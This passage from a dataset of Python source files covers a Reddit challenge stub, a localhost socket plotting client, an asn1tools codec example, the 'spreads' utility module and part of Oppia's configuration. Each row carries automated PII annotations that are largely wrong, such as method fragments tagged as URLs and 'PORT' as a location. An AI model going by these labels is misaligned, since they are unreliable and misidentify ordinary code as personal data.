+#Restrictions +* To keep output slightly shorter, a word will only be considered a word if it is 2 or more letters in length +* The word you are using may not be permuted to get a different set of words (You can't change 'report' to 'repotr' so +that you can add more words to your list) +#Finally +Have a good challenge idea? +Consider submitting it to /r/dailyprogrammer_ideas +"""""" + + +def main(): + pass + + +if __name__ == ""__main__"": + main() +",1256,"[['DATE_TIME', '2014-11-26'], ['DATE_TIME', 'This weeks'], ['PERSON', 'enable1.txt](http://www.joereynoldsaudio.com'], ['PERSON', 'grayson'], ['PERSON', 'repotr'], ['URL', 'https://www.red'], ['URL', 'http://www.joereynoldsaudio.com/enable1.txt']]" +1,"from mpl_toolkits.mplot3d import axes3d +import numpy as np +import matplotlib.pyplot as plt +from matplotlib.animation import FuncAnimation +from socket import * +import time + +# Declare all global variables + +HOST = '127.0.0.1' +PORT = 21566 +BUFSIZ = 512 +ADDR = (HOST, PORT) + +bad_packet = 0 +good_packet = 0 +# fig, ax = plt.subplots() + +fig = plt.figure() +ax = fig.add_subplot(111, projection='3d') + +# Socket +tcpCliSock = socket(AF_INET, SOCK_STREAM) +tcpCliSock.connect(ADDR) + +# Interactive mode: do not block while drawing +plt.ion() + +tstart = time.time() +# real-time plotting loop + +X, Y, Z = [], [], [] + +while True: + try: + # read data from the network + data = tcpCliSock.recv(BUFSIZ) + if data: + print(len(X), data) + data = data.decode().split(',') + if len(data) == 9: + # print('Data received', data) + # tcpCliSock.send(b'Ok') + good_packet += 1 + # the first three fields are the X/Y/Z coordinates + X.append(float(data[0])) + Y.append(float(data[1])) + Z.append(float(data[2])) + else: + bad_packet += 1 + + frame = ax.scatter(X, Y, Z, c='b', marker='o') + + # Remove old line collection before drawing + #if oldcol is not None: + # ax.collections.remove(oldcol) + + plt.pause(0.001 / max(len(X), 1)) + + + except KeyboardInterrupt: + tcpCliSock.close() + print('FPS: %f' % (len(X) / (time.time() - tstart))) + break +",1493,"[['LOCATION', 'Объявляем'], ['LOCATION', 'PORT'], ['LOCATION', 'tcpCliSock'], ['PERSON', 'данные из'], ['PERSON', 'данные из'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'toolkits.mp'], ['URL', 'matplotlib.py'], ['URL', 'matplotlib.an'], ['URL', 'plt.su'], ['URL', 'plt.fi'], ['URL', 'fig.ad'], ['URL', 'tcpCliSock.co'], ['URL', 'plt.io'], ['URL', 'tcpCliSock.re'], ['URL', 'data.de'], ['URL', 'tcpCliSock.se'], ['URL', 'tcpCliSock.re'], ['URL', 'ax.sc'], ['URL', 'ax.collections.re'], ['URL', 'plt.pa'], ['URL', 'tcpCliSock.cl']]" +2,"#!/usr/bin/env python + +""""""Encoding and decoding of a question once for each codec. + +Example execution: + +$ ./question.py +ASN.1 specification: + +-- A simple protocol taken from Wikipedia.
+ +Foo DEFINITIONS ::= BEGIN + + Question ::= SEQUENCE { + id INTEGER, + question IA5String + } + + Answer ::= SEQUENCE { + id INTEGER, + answer BOOLEAN + } + +END + +Question to encode: {'id': 1, 'question': 'Is 1+1=3?'} + +BER: +Encoded: 300e0201011609497320312b313d333f (16 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +DER: +Encoded: 300e0201011609497320312b313d333f (16 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +JER: +Encoded: PI:KEY (31 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +OER: +Encoded: 010109497320312b313d333f (12 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +PER: +Encoded: 010109497320312b313d333f (12 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +UPER: +Encoded: 01010993cd03156c5eb37e (11 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +XER: +Encoded: PI:KEY (61 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +Protocol Buffers: +Encoded: 08011209497320312b313d333f (13 bytes) +Decoded: +id: 1 +question: ""Is 1+1=3?"" +$ + +"""""" + +from __future__ import print_function +import os +from binascii import hexlify +import asn1tools +from foo_pb2 import Question + +SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__)) +FOO_ASN_PATH = os.path.join(SCRIPT_DIR, + '..', + '..', + '..', + 'tests', + 'files', + 'foo.asn') + +# Print the specification. +print('ASN.1 specification:') +print() + +with open(FOO_ASN_PATH) as fin: + print(fin.read()) + +# The question to encode. +question = {'id': 1, 'question': 'Is 1+1=3?'} + +print(""Question to encode:"", question) + +# Encode and decode the question once for each codec. +for codec in ['ber', 'der', 'jer', 'oer', 'per', 'uper', 'xer']: + foo = asn1tools.compile_files(FOO_ASN_PATH, codec) + encoded = foo.encode('Question', question) + decoded = foo.decode('Question', encoded) + + print() + print('{}:'.format(codec.upper())) + print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'), + len(encoded))) + print('Decoded:', decoded) + + +# Also encode using protocol buffers. +question = Question() +question.id = 1 +question.question = 'Is 1+1=3?' + +encoded = question.SerializeToString() +decoded = question + +print() +print('Protocol Buffers:') +print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'), + len(encoded))) +print('Decoded:') +print(decoded) +",2721,"[['PERSON', 'ASN.1'], ['DATE_TIME', '010109497320312b313d333f'], ['DATE_TIME', '010109497320312b313d333f'], ['PERSON', 'oer'], ['IP_ADDRESS', ' ::'], ['URL', 'question.py'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.path.jo'], ['URL', 'foo.as'], ['URL', 'fin.re'], ['URL', 'asn1tools.com'], ['URL', 'foo.de'], ['URL', 'question.id'], ['URL', 'question.Se']]" +3,"# -*- coding: utf-8 -*- + +# Copyright (C) 2014 Johannes Baiter dummy@email.com +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. + +# You should have received a copy of the GNU Affero General Public License +# along with this program. If not, see . + +"""""" +Various utility functions and classes. 
+"""""" + +from __future__ import division, unicode_literals, print_function + +import abc +import glob +import json +import logging +import os +import pkg_resources +import platform +import re +import subprocess +from unicodedata import normalize + +import blinker +import colorama +import psutil +import roman +from colorama import Fore, Back, Style +from spreads.vendor.pathlib import Path + + +class SpreadsException(Exception): + """""" General exception """""" + pass + + +class DeviceException(SpreadsException): + """""" Raised when a device-related error occurred. """""" + pass + + +class MissingDependencyException(SpreadsException): + """""" Raised when a dependency for a plugin is missing. """""" + pass + + +def get_version(): + """""" Get installed version via pkg_resources. """""" + return pkg_resources.require('spreads')[0].version + + +def find_in_path(name): + """""" Find executable in $PATH. + + :param name: name of the executable + :type name: unicode + :returns: Path to executable or None if not found + :rtype: unicode or None + + """""" + candidates = None + if is_os('windows'): + import _winreg + if name.startswith('scantailor'): + try: + cmd = _winreg.QueryValue( + _winreg.HKEY_CLASSES_ROOT, + 'Scan Tailor Project\\shell\\open\\command') + bin_path = cmd.split('"" ""')[0][1:] + if name.endswith('-cli'): + bin_path = bin_path[:-4] + ""-cli.exe"" + return bin_path if os.path.exists(bin_path) else None + except OSError: + return None + else: + path_dirs = os.environ.get('PATH').split(';') + path_dirs.append(os.getcwd()) + path_exts = os.environ.get('PATHEXT').split(';') + candidates = (os.path.join(p, name + e) + for p in path_dirs + for e in path_exts) + else: + candidates = (os.path.join(p, name) + for p in os.environ.get('PATH').split(':')) + return next((c for c in candidates if os.path.exists(c)), None) + + +def is_os(osname): + """""" Check if the current operating system matches the expected one. + + :param osname: Operating system name as returned by + :py:func:`platform.system` + :returns: Whether the OS matches or not + :rtype: bool + """""" + return platform.system().lower() == osname + + +def check_futures_exceptions(futures): + """""" Go through passed :py:class:`concurrent.futures._base.Future` objects + and re-raise the first Exception raised by any one of them. + + :param futures: Iterable that contains the futures to be checked + :type futures: iterable with :py:class:`concurrent.futures._base.Future` + instances + """""" + if any(x.exception() for x in futures): + raise next(x for x in futures if x.exception()).exception() + + +def get_free_space(path): + """""" Return free space on file-system underlying the passed path. + + :param path: Path on file-system the free space of which is desired. + :type path: unicode + :return: Free space in bytes. + :rtype: int + + """""" + return psutil.disk_usage(unicode(path)).free + + +def get_subprocess(cmdline, **kwargs): + """""" Get a :py:class:`subprocess.Popen` instance. + + On Windows systems, the process will be run in the background and won't + open a cmd-window or appear in the taskbar. + The function signature matches that of the :py:class:`subprocess.Popen` + initialization method.
+ """""" + if subprocess.mswindows and 'startupinfo' not in kwargs: + su = subprocess.STARTUPINFO() + su.dwFlags |= subprocess.STARTF_USESHOWWINDOW + su.wShowWindow = subprocess.SW_HIDE + kwargs['startupinfo'] = su + return subprocess.Popen(cmdline, **kwargs) + + +def wildcardify(pathnames): + """""" Try to generate a single path with wildcards that matches all + `pathnames`. + + :param pathnames: List of pathnames to find a wildcard string for + :type pathnames: List of str/unicode + :return: The wildcard string or None if none was found + :rtype: unicode or None + """""" + wildcard_str = """" + for idx, char in enumerate(pathnames[0]): + if all(p[idx] == char for p in pathnames[1:]): + wildcard_str += char + elif not wildcard_str or wildcard_str[-1] != ""*"": + wildcard_str += ""*"" + matched_paths = glob.glob(wildcard_str) + if not sorted(pathnames) == sorted(matched_paths): + return None + return wildcard_str + + +def diff_dicts(old, new): + """""" Get the difference between two dictionaries. + + :param old: Dictionary to base comparison on + :type old: dict + :param new: Dictionary to compare with + :type new: dict + :return: A (possibly nested) dictionary containing all items from `new` + that differ from the ones in `old` + :rtype: dict + """""" + out = {} + for key, value in old.iteritems(): + if isinstance(value, dict) and isinstance(new[key], dict): + # recurse into nested dictionaries so the diff stays minimal + diff = diff_dicts(value, new[key]) + if diff: + out[key] = diff + elif new[key] != value: + out[key] = new[key] + return out + + +def slugify(text, delimiter=u'-'): + """"""Generates an ASCII-only slug. + + Code adapted from Flask snippet by Armin Ronacher: + http://flask.pocoo.org/snippets/5/ + + :param text: Text to create slug for + :type text: unicode + :param delimiter: Delimiter to use in slug + :type delimiter: unicode + :return: The generated slug + :rtype: unicode + """""" + punctuation_re = r'[\t !""#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+' + result = [] + for word in re.split(punctuation_re, text.lower()): + word = normalize('NFKD', word).encode('ascii', 'ignore') + if word: + result.append(word) + return unicode(delimiter.join(result)) + + +class _instancemethodwrapper(object): # noqa + def __init__(self, callable): + self.callable = callable + self.__dontcall__ = False + + def __getattr__(self, key): + return getattr(self.callable, key) + + def __call__(self, *args, **kwargs): + if self.__dontcall__: + raise TypeError('Attempted to call abstract method.') + return self.callable(*args, **kwargs) + + +class _classmethod(classmethod): # noqa + def __init__(self, func): + super(_classmethod, self).__init__(func) + isabstractmethod = getattr(func, '__isabstractmethod__', False) + if isabstractmethod: + self.__isabstractmethod__ = isabstractmethod + + def __get__(self, instance, owner): + result = _instancemethodwrapper(super(_classmethod, self) + .__get__(instance, owner)) + isabstractmethod = getattr(self, '__isabstractmethod__', False) + if isabstractmethod: + result.__isabstractmethod__ = isabstractmethod + abstractmethods = getattr(owner, '__abstractmethods__', None) + if abstractmethods and result.__name__ in abstractmethods: + result.__dontcall__ = True + return result + + +class abstractclassmethod(_classmethod): # noqa + """""" New decorator class that implements the @abstractclassmethod decorator + added in Python 3.3 for Python 2.7.
+ + Kudos to http://stackoverflow.com/a/13640018/487903 + """""" + def __init__(self, func): + func = abc.abstractmethod(func) + super(abstractclassmethod, self).__init__(func) + + +class ColourStreamHandler(logging.StreamHandler): + """""" A colorized output StreamHandler + + Kudos to Leigh MacDonald: http://goo.gl/Lpr6C5 + """""" + + # Some basic colour scheme defaults + colours = { + 'DEBUG': Fore.CYAN, + 'INFO': Fore.GREEN, + 'WARN': Fore.YELLOW, + 'WARNING': Fore.YELLOW, + 'ERROR': Fore.RED, + 'CRIT': Back.RED + Fore.WHITE, + 'CRITICAL': Back.RED + Fore.WHITE + } + + @property + def is_tty(self): + """""" Check if we are using a ""real"" TTY. If we are not using a TTY it + means that the colour output should be disabled. + + :return: Using a TTY status + :rtype: bool + """""" + try: + return getattr(self.stream, 'isatty', None)() + except: + return False + + def emit(self, record): + try: + message = self.format(record) + if not self.is_tty: + self.stream.write(message) + else: + self.stream.write(self.colours[record.levelname] + + message + Style.RESET_ALL) + self.stream.write(getattr(self, 'terminator', '\n')) + self.flush() + except (KeyboardInterrupt, SystemExit): + raise + except: + self.handleError(record) + + +class EventHandler(logging.Handler): + """""" Subclass of :py:class:`logging.Handler` that emits a + :py:class:`blinker.base.Signal` whenever a new record is emitted. + """""" + signals = blinker.Namespace() + on_log_emit = signals.signal('logrecord', doc=""""""\ + Sent when a log record was emitted. + + :keyword :class:`logging.LogRecord` record: the LogRecord + """""") + + def emit(self, record): + self.on_log_emit.send(record=record) + + +def get_data_dir(create=False): + """""" Return (and optionally create) the user's default data directory. + + :param create: Create the data directory if it doesn't exist + :type create: bool + :return: Path to the default data directory + :rtype: unicode + """""" + unix_dir_var = 'XDG_DATA_HOME' + unix_dir_fallback = '~/.config' + windows_dir_var = 'APPDATA' + windows_dir_fallback = '~\\AppData\\Roaming' + mac_dir = '~/Library/Application Support' + base_dir = None + if is_os('darwin'): + if Path(unix_dir_fallback).exists(): + base_dir = unix_dir_fallback + else: + base_dir = mac_dir + elif is_os('windows'): + if windows_dir_var in os.environ: + base_dir = os.environ[windows_dir_var] + else: + base_dir = windows_dir_fallback + else: + if unix_dir_var in os.environ: + base_dir = os.environ[unix_dir_var] + else: + base_dir = unix_dir_fallback + app_path = Path(base_dir)/'spreads' + if create and not app_path.exists(): + app_path.mkdir() + return unicode(app_path) + + +def colorize(text, color): + """""" Return text with a new ANSI foreground color. + + :param text: Text to be wrapped + :param color: ANSI color to wrap text in + :type color: str (from `colorama.ansi `) + :return: Colorized text + """""" + return color + text + colorama.Fore.RESET + + +class RomanNumeral(object): + """""" Number type that represents integers as Roman numerals and that + can be used in all arithmetic operations applicable to integers. + """""" + @staticmethod + def is_roman(value): + """""" Check if `value` is a valid Roman numeral. + + :param value: Value to be checked + :type value: unicode + :returns: Whether the value is valid or not + :rtype: bool + """""" + return bool(roman.romanNumeralPattern.match(value)) + + def __init__(self, value, case='upper'): + """""" Create a new instance.
+ + :param value: Value of the instance + :type value: int, unicode containing valid Roman numeral or + :py:class:`RomanNumeral` + """""" + self._val = self._to_int(value) + self._case = case + if isinstance(value, basestring) and not self.is_roman(value): + self._case = 'lower' + elif isinstance(value, RomanNumeral): + self._case = value._case + + def _to_int(self, value): + if isinstance(value, int): + return value + elif isinstance(value, basestring) and self.is_roman(value.upper()): + return roman.fromRoman(value.upper()) + elif isinstance(value, RomanNumeral): + return value._val + else: + raise ValueError(""Value must be a valid roman numeral, a string"" + "" representing one or an integer: '{0}'"" + .format(value)) + + def __cmp__(self, other): + if self._val > self._to_int(other): + return 1 + elif self._val == self._to_int(other): + return 0 + elif self._val < self._to_int(other): + return -1 + + def __add__(self, other): + return RomanNumeral(self._val + self._to_int(other), self._case) + + def __sub__(self, other): + return RomanNumeral(self._val - self._to_int(other), self._case) + + def __int__(self): + return self._val + + def __str__(self): + strval = roman.toRoman(self._val) + if self._case == 'lower': + return strval.lower() + else: + return strval + + def __unicode__(self): + return unicode(str(self)) + + def __repr__(self): + return str(self) + + +class CustomJSONEncoder(json.JSONEncoder): + """""" Custom :py:class:`json.JSONEncoder`. + + Uses an object's `to_dict` method if present for serialization. + + Serializes :py:class:`pathlib.Path` instances to the string + representation of their relative path to a BagIt-compliant directory or + their absolute path if not applicable. + """""" + def default(self, obj): + if hasattr(obj, 'to_dict'): + return obj.to_dict() + if isinstance(obj, Path): + # Serialize paths that belong to a workflow as paths relative to + # its base directory + base = next((p for p in obj.parents if (p/'bagit.txt').exists()), + None) + if base: + return unicode(obj.relative_to(base)) + else: + return unicode(obj.absolute()) + return json.JSONEncoder.default(self, obj) +",14758,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Johannes Baiter'], ['PERSON', 'get_subprocess(cmdline'], ['PERSON', 'Armin Ronacher'], ['PERSON', 'punctuation_re'], ['PERSON', 'Kudos'], ['PERSON', 'Leigh MacDonald'], ['URL', 'blinker.Na'], ['URL', 'signals.si'], ['NRP', 'Serialize'], ['LOCATION', 'next((p'], ['LOCATION', 'unicode(obj.relative_to(base'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://flask.pocoo.org/snippets/5/'], ['URL', 'http://stackoverflow.com/a/13640018/487903'], ['URL', 'http://goo.gl/Lpr6C5'], ['URL', 'http://git.io/9qnt0Q'], ['URL', 'email.com'], ['URL', 'spreads.vendor.pa'], ['URL', 'resources.re'], ['URL', 'name.st'], ['URL', 'winreg.HK'], ['URL', 'os.pa'], ['URL', 'os.environ.ge'], ['URL', 'os.ge'], ['URL', 'os.environ.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.environ.ge'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'platform.sy'], ['URL', 'subprocess.ms'], ['URL', 'subprocess.ST'], ['URL', 'subprocess.ST'], ['URL', 'su.wS'], ['URL', 'glob.gl'], ['URL', 'old.it'], ['URL', 'delimiter.jo'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'logging.St'], ['URL', 'Fore.CY'], ['URL', 'Fore.GR'], ['URL', 'Fore.YE'], ['URL', 'Fore.YE'], ['URL', 'Fore.RED'], ['URL', 'Back.RED'], ['URL', 'Back.RED'], ['URL', 'self.st'], ['URL', 'self.fo'], ['URL', 'self.is'], ['URL', 
'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'Style.RE'], ['URL', 'self.st'], ['URL', 'blinker.base.Si'], ['URL', 'emit.se'], ['URL', 'path.mk'], ['URL', 'colorama.an'], ['URL', 'colorama.Fore.RE'], ['URL', 'roman.romanNumeralPattern.ma'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'roman.fr'], ['URL', 'roman.to'], ['URL', 'pathlib.Pa'], ['URL', 'obj.to'], ['URL', 'obj.pa'], ['URL', 'obj.re'], ['URL', 'json.JSONEncoder.de']]" +4,"# coding: utf-8 +# +# Copyright 2014 The Oppia Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS-IS"" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""""""Stores various configuration options and constants for Oppia."""""" + +import copy +import datetime +import os + + +# Whether to unconditionally log info messages. +DEBUG = False + +# The platform for the storage backend. This is used in the model-switching +# code in core/platform. +PLATFORM = 'gae' + +# This should be a string comparison, since all environment variables +# are converted to strings +IS_MINIFIED = os.environ.get('MINIFICATION') == 'True' + +# Whether we should serve the development or production experience. +# DEV_MODE should only be changed to False in the production environment. +# To use minified resources in the development environment, +# change the MINIFICATION env variable in app.yaml to True. +# When DEV_MODE is True, this indicates that we are not running in +# the production App Engine environment, which affects things like +# login/logout URLs, as well as third-party libraries +# that App Engine normally provides. +if PLATFORM == 'gae': + DEV_MODE = ( + not os.environ.get('SERVER_SOFTWARE') + or os.environ['SERVER_SOFTWARE'].startswith('Development')) +else: + raise Exception('Invalid platform: expected one of [\'gae\']') + +TESTS_DATA_DIR = os.path.join('core', 'tests', 'data') +SAMPLE_EXPLORATIONS_DIR = os.path.join('data', 'explorations') +SAMPLE_COLLECTIONS_DIR = os.path.join('data', 'collections') +INTERACTIONS_DIR = os.path.join('extensions', 'interactions') +GADGETS_DIR = os.path.join('extensions', 'gadgets') +RTE_EXTENSIONS_DIR = os.path.join('extensions', 'rich_text_components') + +OBJECT_TEMPLATES_DIR = os.path.join('extensions', 'objects', 'templates') + +# Choose production template if minification flag is used or +# if in production mode +TEMPLATES_DIR_PREFIX = 'prod' if (IS_MINIFIED or not DEV_MODE) else 'dev' +FRONTEND_TEMPLATES_DIR = os.path.join( + 'core', 'templates', TEMPLATES_DIR_PREFIX, 'head') +DEPENDENCIES_TEMPLATES_DIR = os.path.join('extensions', 'dependencies') +VALUE_GENERATORS_DIR = os.path.join('extensions', 'value_generators') +OBJECT_DEFAULT_VALUES_FILE_PATH = os.path.join( + 'extensions', 'interactions', 'object_defaults.json') +RULES_DESCRIPTIONS_FILE_PATH = os.path.join( + os.getcwd(), 'extensions', 'interactions', 'rules.json') + +# The maximum number of results to retrieve in a datastore query. +DEFAULT_QUERY_LIMIT = 1000 + +# The maximum number of results to retrieve in a datastore query +# for top rated published explorations in /library page.
+NUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE = 8 + +# The maximum number of results to retrieve in a datastore query +# for recently published explorations in /library page. +RECENTLY_PUBLISHED_QUERY_LIMIT_FOR_LIBRARY_PAGE = 8 + +# The maximum number of results to retrieve in a datastore query +# for top rated published explorations in /library/top_rated page. +NUMBER_OF_TOP_RATED_EXPLORATIONS_FULL_PAGE = 20 + +# The maximum number of results to retrieve in a datastore query +# for recently published explorations in /library/recently_published page. +RECENTLY_PUBLISHED_QUERY_LIMIT_FULL_PAGE = 20 + +# The current version of the dashboard stats blob schema. If any backward- +# incompatible changes are made to the stats blob schema in the data store, +# this version number must be changed. +CURRENT_DASHBOARD_STATS_SCHEMA_VERSION = 1 + +# The current version of the exploration states blob schema. If any backward- +# incompatible changes are made to the states blob schema in the data store, +# this version number must be changed and the exploration migration job +# executed. +CURRENT_EXPLORATION_STATES_SCHEMA_VERSION = 7 + +# The current version of the all collection blob schemas (such as the nodes +# structure within the Collection domain object). If any backward-incompatible +# changes are made to any of the blob schemas in the data store, this version +# number must be changed. +CURRENT_COLLECTION_SCHEMA_VERSION = 2 + +# The default number of exploration tiles to load at a time in the search +# results page. +SEARCH_RESULTS_PAGE_SIZE = 20 + +# The default number of commits to show on a page in the exploration history +# tab. +COMMIT_LIST_PAGE_SIZE = 50 + +# The default number of items to show on a page in the exploration feedback +# tab. +FEEDBACK_TAB_PAGE_SIZE = 20 + +# Default title for a newly-minted exploration. +DEFAULT_EXPLORATION_TITLE = '' +# Default category for a newly-minted exploration. +DEFAULT_EXPLORATION_CATEGORY = '' +# Default objective for a newly-minted exploration. +DEFAULT_EXPLORATION_OBJECTIVE = '' + +# Default name for the initial state of an exploration. +DEFAULT_INIT_STATE_NAME = 'Introduction' +# The default content text for the initial state of an exploration. +DEFAULT_INIT_STATE_CONTENT_STR = '' + +# Default title for a newly-minted collection. +DEFAULT_COLLECTION_TITLE = '' +# Default category for a newly-minted collection. +DEFAULT_COLLECTION_CATEGORY = '' +# Default objective for a newly-minted collection. +DEFAULT_COLLECTION_OBJECTIVE = '' + +# A dict containing the accepted image formats (as determined by the imghdr +# module) and the corresponding allowed extensions in the filenames of uploaded +# files. +ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS = { + 'jpeg': ['jpg', 'jpeg'], + 'png': ['png'], + 'gif': ['gif'] +} + +# A string containing the disallowed characters in state or exploration names. +# The underscore is needed because spaces in names must be converted to +# underscores when displayed as part of a URL or key. The other conventions +# here are derived from the Wikipedia guidelines for naming articles. +INVALID_NAME_CHARS = u':#/|_%<>[]{}\ufffd\\' + chr(127) +for ind in range(32): + INVALID_NAME_CHARS += chr(ind) +# Prefix for data sent from the server to the client via JSON. +XSSI_PREFIX = ')]}\'\n' +# A regular expression for alphanumeric characters. +ALPHANUMERIC_REGEX = r'^[A-Za-z0-9]+$' +# A regular expression for alphanumeric words separated by single spaces. +# Ex.: 'valid name', 'another valid name', 'invalid name'. 
+ALPHANUMERIC_SPACE_REGEX = r'^[0-9A-Za-z]+(?:[ ]?[0-9A-Za-z]+)*$' +# A regular expression for tags. +TAG_REGEX = r'^[a-z ]+$' + +# Invalid names for parameters used in expressions. +AUTOMATICALLY_SET_PARAMETER_NAMES = ['answer', 'choices'] +INVALID_PARAMETER_NAMES = AUTOMATICALLY_SET_PARAMETER_NAMES + [ + 'abs', 'all', 'and', 'any', 'else', 'floor', 'if', 'log', 'or', + 'pow', 'round', 'then'] + +# These are here rather than in rating_services.py to avoid import +# circularities with exp_services. +# TODO (Jacob) Refactor exp_services to remove this problem. +_EMPTY_RATINGS = {'1': 0, '2': 0, '3': 0, '4': 0, '5': 0} +def get_empty_ratings(): + return copy.deepcopy(_EMPTY_RATINGS) + +# Empty scaled average rating as a float. +EMPTY_SCALED_AVERAGE_RATING = 0.0 + +# To use GAE email service. +EMAIL_SERVICE_PROVIDER_GAE = 'gae_email_service' +# To use mailgun email service. +EMAIL_SERVICE_PROVIDER_MAILGUN = 'mailgun_email_service' +# Use GAE email service by default. +EMAIL_SERVICE_PROVIDER = EMAIL_SERVICE_PROVIDER_GAE +# If the Mailgun email API is used, the ""None"" below should be replaced +# with the Mailgun API key. +MAILGUN_API_KEY = None +# If the Mailgun email API is used, the ""None"" below should be replaced +# with the Mailgun domain name (ending with mailgun.org). +MAILGUN_DOMAIN_NAME = None +# Committer id for system actions. +SYSTEM_COMMITTER_ID = 'admin' +SYSTEM_EMAIL_ADDRESS = 'dummy@email.com' +ADMIN_EMAIL_ADDRESS = 'dummy@email.com' +NOREPLY_EMAIL_ADDRESS = 'dummy@email.com' +# Ensure that SYSTEM_EMAIL_ADDRESS and ADMIN_EMAIL_ADDRESS are both valid and +# correspond to owners of the app before setting this to True. If +# SYSTEM_EMAIL_ADDRESS is not that of an app owner, email messages from this +# address cannot be sent. If True then emails can be sent to any user. +CAN_SEND_EMAILS = False +# If you want to turn on this facility please check the email templates in the +# send_role_notification_email() function in email_manager.py and modify them +# accordingly. +CAN_SEND_EDITOR_ROLE_EMAILS = False +# If enabled then emails will be sent to creators for feedback messages. +CAN_SEND_FEEDBACK_MESSAGE_EMAILS = False +# Time to wait before sending feedback message emails (currently set to 1 +# hour). +DEFAULT_FEEDBACK_MESSAGE_EMAIL_COUNTDOWN_SECS = 3600 +# Whether to send an email when a new feedback message is received for +# an exploration. +DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True +# Whether to send email updates to a user who has not specified a preference. +DEFAULT_EMAIL_UPDATES_PREFERENCE = False +# Whether to send an invitation email when the user is granted +# new role permissions in an exploration. +DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE = True +# Whether to require an email to be sent, following a moderator action. +REQUIRE_EMAIL_ON_MODERATOR_ACTION = False +# Whether to allow custom event reporting to Google Analytics. +CAN_SEND_ANALYTICS_EVENTS = False +# Timespan in minutes before allowing duplicate emails. +DUPLICATE_EMAIL_INTERVAL_MINS = 2 +# Number of digits after the decimal point to which the average ratings +# value in the dashboard is rounded.
+AVERAGE_RATINGS_DASHBOARD_PRECISION = 2 + +EMAIL_INTENT_SIGNUP = 'signup' +EMAIL_INTENT_DAILY_BATCH = 'daily_batch' +EMAIL_INTENT_EDITOR_ROLE_NOTIFICATION = 'editor_role_notification' +EMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = 'feedback_message_notification' +EMAIL_INTENT_SUGGESTION_NOTIFICATION = 'suggestion_notification' +EMAIL_INTENT_REPORT_BAD_CONTENT = 'report_bad_content' +EMAIL_INTENT_MARKETING = 'marketing' +EMAIL_INTENT_PUBLICIZE_EXPLORATION = 'publicize_exploration' +EMAIL_INTENT_UNPUBLISH_EXPLORATION = 'unpublish_exploration' +EMAIL_INTENT_DELETE_EXPLORATION = 'delete_exploration' + +MODERATOR_ACTION_PUBLICIZE_EXPLORATION = 'publicize_exploration' +MODERATOR_ACTION_UNPUBLISH_EXPLORATION = 'unpublish_exploration' +DEFAULT_SALUTATION_HTML_FN = ( + lambda recipient_username: 'Hi %s,' % recipient_username) +DEFAULT_SIGNOFF_HTML_FN = ( + lambda sender_username: ( + 'Thanks!
    %s (Oppia moderator)' % sender_username)) + +VALID_MODERATOR_ACTIONS = { + MODERATOR_ACTION_PUBLICIZE_EXPLORATION: { + 'email_config': 'publicize_exploration_email_html_body', + 'email_subject_fn': ( + lambda exp_title: ( + 'Your Oppia exploration ""%s"" has been featured!' % exp_title)), + 'email_intent': EMAIL_INTENT_PUBLICIZE_EXPLORATION, + 'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN, + 'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN, + }, + MODERATOR_ACTION_UNPUBLISH_EXPLORATION: { + 'email_config': 'unpublish_exploration_email_html_body', + 'email_subject_fn': ( + lambda exp_title: ( + 'Your Oppia exploration ""%s"" has been unpublished' % exp_title) + ), + 'email_intent': 'unpublish_exploration', + 'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN, + 'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN, + }, +} + +# Panel properties and other constants for the default skin. +GADGET_PANEL_AXIS_HORIZONTAL = 'horizontal' +PANELS_PROPERTIES = { + 'bottom': { + 'width': 350, + 'height': 100, + 'stackable_axis': GADGET_PANEL_AXIS_HORIZONTAL, + 'pixels_between_gadgets': 80, + 'max_gadgets': 1 + } +} + +# When the site terms were last updated, in UTC. +REGISTRATION_PAGE_LAST_UPDATED_UTC = datetime.datetime(2015, 10, 14, 2, 40, 0) + +# Format of string for dashboard statistics logs. +# NOTE TO DEVELOPERS: This format should not be changed, since it is used in +# the existing storage models for UserStatsModel. +DASHBOARD_STATS_DATETIME_STRING_FORMAT = '%Y-%m-%d' + +# The maximum size of an uploaded file, in bytes. +MAX_FILE_SIZE_BYTES = 1048576 + +# The default language code for an exploration. 